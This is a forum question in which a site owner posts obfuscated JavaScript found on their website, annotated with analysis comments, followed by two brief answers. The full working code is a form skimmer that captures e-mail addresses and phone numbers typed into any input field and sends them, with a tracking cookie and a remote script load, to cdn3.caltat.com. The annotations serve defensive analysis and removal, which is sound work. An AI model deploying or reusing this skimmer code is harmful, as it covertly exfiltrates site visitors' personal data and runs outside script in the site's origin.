JavaScript
linuxnb, 2018-02-16 13:40:14

I found this code on my site, what is it?

I found this code on my website; apparently it came in along with a bunch of other scripts from the public. I can't understand what this code does; it's in JS.

// String table for the obfuscated script: every property name, cookie fragment and URL the
// code uses is stored here and fetched by index through _0x430d().
// The statement that follows this array rotates it in place before any lookup, so the
// literal positions below are NOT the indices used at the call sites.
// The only network destinations in the table are the two cdn3.caltat.com endpoints
// (jdata.php and udt.php); those hostnames/paths are the strings to search for in proxy
// logs, CSP reports and other templates on the site.
var _0x47fd = ['location', '&r=', 'text/javascript', 'cookie', 'split', 'substring', 'indexOf', '\x20undefined', 'host', 'getFullYear', ';\x20expires=', ';\x20path=', ';\x20path=/', ';\x20domain=', 'length', ';\x20secure', 'createElement', 'script', 'type', 'async', 'src', 'https://cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/jdata.php?s=', '&a=', 'getElementsByTagName', 'head', 'appendChild', 'test', 'body', 'change', 'input', 'INPUT', 'target', 'value', '//cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/udt.php?n=', '&u='];
// Rotates the string table in place so that index literals in the rest of the script do
// not line up with the order the strings are written in.
// Called with (_0x47fd, 0x11b): the counter is pre-incremented to 284 and the loop
// pre-decrements before each test, so the body runs 283 times. Each pass moves the first
// element to the end; with the 35-entry table that is a net left rotation by 3
// (index 0 becomes 'cookie', index 1 'split', and so on).
(function(_0x224e74, _0xcd7334) {
  var _0x14ff53 = function(_0x4e3dd6) {
    while(--_0x4e3dd6) {
      // One left rotation: shift() removes the head, push() appends it to the tail.
      _0x224e74['push'](_0x224e74['shift']());
    }
  };
  _0x14ff53(++_0xcd7334);
}(_0x47fd, 0x11b));
// String-table accessor used at every call site: takes an index written as a hex string
// (for example '0x1a') and returns the entry of the already-rotated _0x47fd at that index.
// The second parameter is never read.
var _0x430d = function(_0x4b111b, _0x2bf227) {
  // Subtracting 0 coerces the hex string to a number.
  _0x4b111b = _0x4b111b - 0x0;
  var _0x327e53 = _0x47fd[_0x4b111b];
  return _0x327e53;
};
// Main payload, invoked immediately with `document` as its only argument.
// Resolving the _0x430d() lookups against the rotated string table, it does three things:
//   1. stores a long-lived first-party cookie named 'caltat' holding the hard-coded id `lh`;
//   2. watches `change` events on <input> elements and, when a value looks like an e-mail
//      address or a +7/8-prefixed phone number, sends it to cdn3.caltat.com (jdata.php);
//   3. injects a remote <script> from cdn3.caltat.com (udt.php) carrying the page URL and
//      referrer.
// NOTE(review): the remote script runs with the page's full privileges, and visitor contact
// data leaves the site in URL query strings. If nobody responsible for the site added this
// integration, remove it, find out how it got into the templates, and consider a
// Content-Security-Policy script-src allowlist so unlisted hosts cannot load script.
! function(_0x2e8a61) {
  // Cookie helper. The parameter is overwritten with 'caltat' before it is read, so the
  // caller's argument is irrelevant. Always returns the global `lh` (also from the catch).
  // If the stored 'caltat' cookie differs from `lh`, it writes
  //   caltat=<escape(lh)>; expires=<Date>; path=/; domain=<last two labels of location.host>
  // where the expiry is new Date(currentYear + 6, 10, 10, 10, 10, 10) concatenated as a
  // string. _0x5aad13, _0x1b93f2 and _0x2924b9 are declared below but never assigned, so the
  // '; path=/' default, the host-derived domain and the no-'; secure' branch are always taken.
  function _0x14d842(_0x5421c3) {
    try {
      // Inner reader: splits document.cookie on '; ' and builds a name -> value map using
      // indexOf('=') and substring(). Returns the value for the requested name (null when
      // absent), or the whole map when the name is '', ' undefined' or null.
      return function(_0x46d4a3) {
        var _0x135912, _0x344da9 = document[_0x430d('0x0')][_0x430d('0x1')](';\x20'),
          _0x3cb8d7 = [];
        for(_0x135912 in _0x344da9)
          if(_0x344da9[_0x135912][_0x430d('0x2')]) {
            var _0x4b8eec = _0x344da9[_0x135912][_0x430d('0x3')]('='),
              _0x3b0145 = _0x344da9[_0x135912][_0x430d('0x2')](0x0, _0x4b8eec),
              _0x52b38d = _0x344da9[_0x135912][_0x430d('0x2')](_0x4b8eec + 0x1);
            _0x3cb8d7[_0x3b0145] = _0x52b38d;
          }
        return '' != _0x46d4a3 && _0x430d('0x4') != _0x46d4a3 && null != _0x46d4a3 ? void 0x0 !== _0x3cb8d7[_0x46d4a3] ? _0x3cb8d7[_0x46d4a3] : null : _0x3cb8d7;
      }(_0x5421c3 = 'caltat') != lh && (_0x479993 = _0x5421c3, _0x2f4b75 = lh, _0x5284ce = '', _0xa5b5d8 = new Date(), _0xc01cbb = location[_0x430d('0x5')]['split']('.'), _0x5284ce = new Date(_0xa5b5d8[_0x430d('0x6')]() + 0x6, 0xa, 0xa, 0xa, 0xa, 0xa), document[_0x430d('0x0')] = _0x479993 + '=' + escape(_0x2f4b75) + (_0x5284ce ? _0x430d('0x7') + _0x5284ce : '') + (_0x5aad13 ? _0x430d('0x8') + _0x5aad13 : _0x430d('0x9')) + (_0x1b93f2 ? _0x430d('0xa') + _0x1b93f2 : _0x430d('0xa') + _0xc01cbb[_0xc01cbb[_0x430d('0xb')] - 0x2] + '.' + _0xc01cbb[_0xc01cbb[_0x430d('0xb')] - 0x1]) + (_0x2924b9 ? _0x430d('0xc') : '')), lh;
    } catch(_0x274ee0) {
      return lh;
    }
    // Hoisted declarations for the names assigned inside the comma expression above.
    var _0x479993, _0x2f4b75, _0x5284ce, _0x5aad13, _0x1b93f2, _0x2924b9, _0xa5b5d8, _0xc01cbb;
  }

  // Sender. Creates an async <script type="text/javascript"> whose src is
  //   https://cdn3.caltat.com/<id>/jdata.php?s=<lh>&a=<base64 of arg 1>&l=<base64 of arg 2>
  // and appends it to the first <head>. Callers pass the e-mail as arg 1 and the phone
  // number as arg 2. btoa() is an encoding, not encryption: the values are readable by
  // anything that sees or logs the URL.
  function _0x50c03a(_0x10cc0d, _0x2318f3) {
    var _0x57f10b = document[_0x430d('0xd')](_0x430d('0xe'));
    _0x57f10b[_0x430d('0xf')] = 'text/javascript', _0x57f10b[_0x430d('0x10')] = !0x0, _0x57f10b[_0x430d('0x11')] = _0x430d('0x12') + _0x14d842() + _0x430d('0x13') + encodeURIComponent(btoa(_0x10cc0d)) + '&l=' + encodeURIComponent(btoa(_0x2318f3)), document[_0x430d('0x14')](_0x430d('0x15'))[0x0][_0x430d('0x16')](_0x57f10b);
  }

  // Classifier for a changed input value: a string matching the e-mail pattern is sent as
  // (value, ''); otherwise a string starting with +7 or 8 followed by 10-15 digits, spaces,
  // parentheses or hyphens is sent as ('', value). Anything else is ignored.
  function _0x599c2e(_0x3d06b4) {
    /^[a-zA-Z0-9\-]{2,30}@[a-z0-9\-]{2,30}\.[a-z0-9\-]{2,10}$/i ['test'](_0x3d06b4) ? _0x50c03a(_0x3d06b4, ''): (/^\+7[0-9\(\)\ \-]{10,15}$/i ['test'](_0x3d06b4) || /^8[0-9\(\)\ \-]{10,15}$/i [_0x430d('0x17')](_0x3d06b4)) && _0x50c03a('', _0x3d06b4);
  }
  // Hard-coded id, used as the 'caltat' cookie value and as the `s=` parameter.
  // NOTE(review): being a constant it is the same for every visitor, so it presumably
  // identifies the site or account rather than the person - confirm with the vendor.
  window['lh'] = 'dfcb074b365c4571abdb669e656badb8';
  var _0x44d79a = !0x0;
  // Probe for a working jQuery by binding a no-op delegated handler
  // ($('body').on('change', 'input', ...)); an exception clears the flag. The no-op handler
  // stays registered when the probe succeeds.
  try {
    $(_0x430d('0x18'))['on'](_0x430d('0x19'), _0x430d('0x1a'), function() {});
  } catch(_0x55054e) {
    _0x44d79a = !0x1;
  }
  // After 500 ms (0x1f4) attach the real listener: the jQuery delegated form when
  // window.jQuery is a function and the probe succeeded, otherwise a native `change`
  // listener on the first <body> that keeps events whose target nodeName is 'INPUT'.
  // No filter on input type, name or form is visible, so every <input> on the page
  // (login, checkout, search, ...) is covered.
  'function' == typeof window['jQuery'] && 0x1 == _0x44d79a ? setTimeout(function() {
    $(_0x430d('0x18'))['on'](_0x430d('0x19'), _0x430d('0x1a'), function() {
      _0x599c2e($(this)['val']());
    });
  }, 0x1f4) : setTimeout(function() {
    document[_0x430d('0x14')]('body')[0x0]['addEventListener']('change', function(_0x47747a) {
      _0x430d('0x1b') == _0x47747a[_0x430d('0x1c')]['nodeName'] && _0x599c2e(_0x47747a[_0x430d('0x1c')][_0x430d('0x1d')]);
    });
  }, 0x1f4);
  // Remote loader URL: //cdn3.caltat.com/<id>/udt.php?n=<timestamp>&u=<encoded page URL>
  // &r=<referrer>. The URL is protocol-relative and the referrer is appended without
  // URL-encoding.
  var _0x5b3bef = _0x430d('0x1e') + new Date()['getTime']();
  _0x5b3bef += _0x430d('0x1f') + encodeURIComponent(_0x2e8a61[_0x430d('0x20')]['href']), _0x5b3bef += _0x430d('0x21') + _0x2e8a61['referrer'];
  // Inject the loader as an async script in <head>; whatever udt.php returns executes in
  // this page's origin. The trailing call writes the 'caltat' cookie on first load.
  var _0x1ee212 = document[_0x430d('0xd')](_0x430d('0xe'));
  _0x1ee212[_0x430d('0xf')] = _0x430d('0x22'), _0x1ee212[_0x430d('0x10')] = !0x0, _0x1ee212[_0x430d('0x11')] = _0x5b3bef, _0x2e8a61[_0x430d('0x14')]('head')[0x0]['appendChild'](_0x1ee212), _0x14d842();
}(document);


2 answer(s)
Andrey Tsvetkov, 2018-02-16
@yellow79

This is a piece of obfuscated code. What exactly it does is difficult to say (it is obfuscated precisely so that this is not clear), but it looks like the result of what it does is sent to cdn3.caltat.com. If this address means nothing to you, I would remove it to be on the safe side. Judging by the info on the main domain, this is code from some kind of CRM.

Maxim, 2018-04-21
@maxus99

More information here - ulogin.reformal.ru/proj/?mod=one&ia=1070795
